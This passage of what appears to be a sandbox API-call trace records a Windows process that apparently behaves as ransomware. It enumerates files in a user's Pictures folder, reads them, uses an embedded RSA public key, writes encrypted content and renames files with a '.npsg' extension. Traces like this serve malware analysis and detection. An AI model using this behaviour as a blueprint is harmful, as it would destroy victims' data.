lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.288] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0238.288] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0238.288] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0238.288] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0238.288] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34009b0 [0238.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0238.288] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0238.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0238.288] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400980 [0238.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0238.288] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400a10 [0238.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.288] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0238.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0238.288] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34009e0 [0238.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.288] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34009c8 [0238.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.288] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400a28 [0238.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34009c8 | out: hHeap=0x620000) returned 1 [0238.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34009c8 [0238.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34009e0 | out: hHeap=0x620000) returned 1 [0238.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0238.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0238.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0238.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0238.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400998 | out: hHeap=0x620000) returned 1 [0238.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400998 [0238.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0238.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0238.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34009f8 | out: hHeap=0x620000) returned 1 [0238.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b830 [0238.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400a28 | out: hHeap=0x620000) returned 1 [0238.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b94b10 [0238.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0238.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7ba60 [0238.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0238.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7bb78 [0238.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400998 | out: hHeap=0x620000) returned 1 [0238.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x346fa10 [0238.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0238.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0238.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0238.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0238.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0238.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0238.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0238.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94b10 | out: hHeap=0x620000) returned 1 [0238.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0238.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0238.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34009c8 | out: hHeap=0x620000) returned 1 [0238.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0238.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400a10 | out: hHeap=0x620000) returned 1 [0238.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0238.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34009b0 | out: hHeap=0x620000) returned 1 [0238.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400980 | out: hHeap=0x620000) returned 1 [0238.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0238.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0238.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0238.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400968 | out: hHeap=0x620000) returned 1 [0238.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3409c20 | out: hHeap=0x620000) returned 1 [0238.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0238.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0238.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0238.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0238.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0238.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0238.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0238.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0238.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0238.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0238.291] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0238.291] WriteFile (in: hFile=0x644, lpBuffer=0x3b85cd0*, nNumberOfBytesToWrite=0x5c43, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b85cd0*, lpNumberOfBytesWritten=0x39afb14*=0x5c43, lpOverlapped=0x0) returned 1 [0238.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b85cd0 | out: hHeap=0x620000) returned 1 [0238.292] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x5c48, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.292] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0238.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0238.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7caa0 [0238.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x346fa10 [0238.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x346fa10, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0238.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b85cd0 [0238.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7caa0 | out: hHeap=0x620000) returned 1 [0238.292] WriteFile (in: hFile=0x644, lpBuffer=0x3b85cd0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b85cd0*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0238.292] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b85cd0 | out: hHeap=0x620000) returned 1 [0238.292] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0238.292] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0238.293] CloseHandle (hObject=0x644) returned 1 [0238.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e5f8 [0238.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x3b85cd0 [0238.303] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e5f8 | out: hHeap=0x620000) returned 1 [0238.303] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lVTDtn H8OPDt\\gsPNvpvKbP2BeG.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lvtdtn h8opdt\\gspnvpvkbp2beg.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lVTDtn H8OPDt\\gsPNvpvKbP2BeG.gif.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lvtdtn h8opdt\\gspnvpvkbp2beg.gif.npsg")) returned 1 [0238.304] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b85cd0 | out: hHeap=0x620000) returned 1 [0238.304] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.304] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0238.306] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x70df58 | out: hHeap=0x620000) returned 1 [0238.306] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62254cc0, ftCreationTime.dwHighDateTime=0x1d5bf9d, ftLastAccessTime.dwLowDateTime=0x1b44c6c0, ftLastAccessTime.dwHighDateTime=0x1d5b834, ftLastWriteTime.dwLowDateTime=0x1b44c6c0, ftLastWriteTime.dwHighDateTime=0x1d5b834, nFileSizeHigh=0x0, nFileSizeLow=0xbfa3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NKsY6vRRu.jpg", cAlternateFileName="NKSY6V~1.JPG")) returned 1 [0238.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0238.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x70df58 [0238.306] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0238.306] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lVTDtn H8OPDt\\NKsY6vRRu.jpg") returned=".jpg" [0238.306] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lVTDtn H8OPDt\\NKsY6vRRu.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lvtdtn h8opdt\\nksy6vrru.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0238.307] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=49059) returned 1 [0238.307] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0238.309] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xbf7d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.310] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0238.311] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0238.312] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.312] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0238.312] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0xbfa3, lpOverlapped=0x0) returned 1 [0238.313] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0238.313] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.313] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.313] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0238.314] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0238.314] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0238.314] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0238.314] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0238.314] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0238.314] GetLastError () returned 0x0 [0238.314] CryptDestroyHash (hHash=0x33f0408) returned 1 [0238.314] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0238.314] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0238.315] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0238.315] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0238.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.315] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0238.315] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0238.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xbfa0) returned 0x3b95d50 [0238.315] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0238.315] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0238.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0238.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0238.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0238.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3409c20 [0238.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400968 [0238.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3409c68 [0238.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400980 [0238.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34009b0 [0238.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400a10 [0238.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34009c8 [0238.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0238.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0238.316] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0238.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0238.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34009b0 | out: hHeap=0x620000) returned 1 [0238.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34009c8 | out: hHeap=0x620000) returned 1 [0238.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400a10 | out: hHeap=0x620000) returned 1 [0238.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0238.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400a10 [0238.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0238.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34009c8 [0238.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0238.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x34009b0 [0238.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0238.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b948 [0238.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0238.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0238.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0238.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7ba60 [0238.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0238.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0238.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0238.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34009c8 | out: hHeap=0x620000) returned 1 [0238.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0238.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34009b0 | out: hHeap=0x620000) returned 1 [0238.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0238.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0238.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400a10 | out: hHeap=0x620000) returned 1 [0238.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0238.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0238.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0238.317] GetCurrentThreadId () returned 0x5b4 [0238.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0238.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b83878 [0238.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0238.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0238.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0238.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0238.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0238.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.318] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.318] GetCurrentThreadId () returned 0x5b4 [0238.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.318] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x33c2ee8 [0238.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.318] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.318] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.318] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0238.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33c2ee8 [0238.318] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0238.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0238.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0238.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0238.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 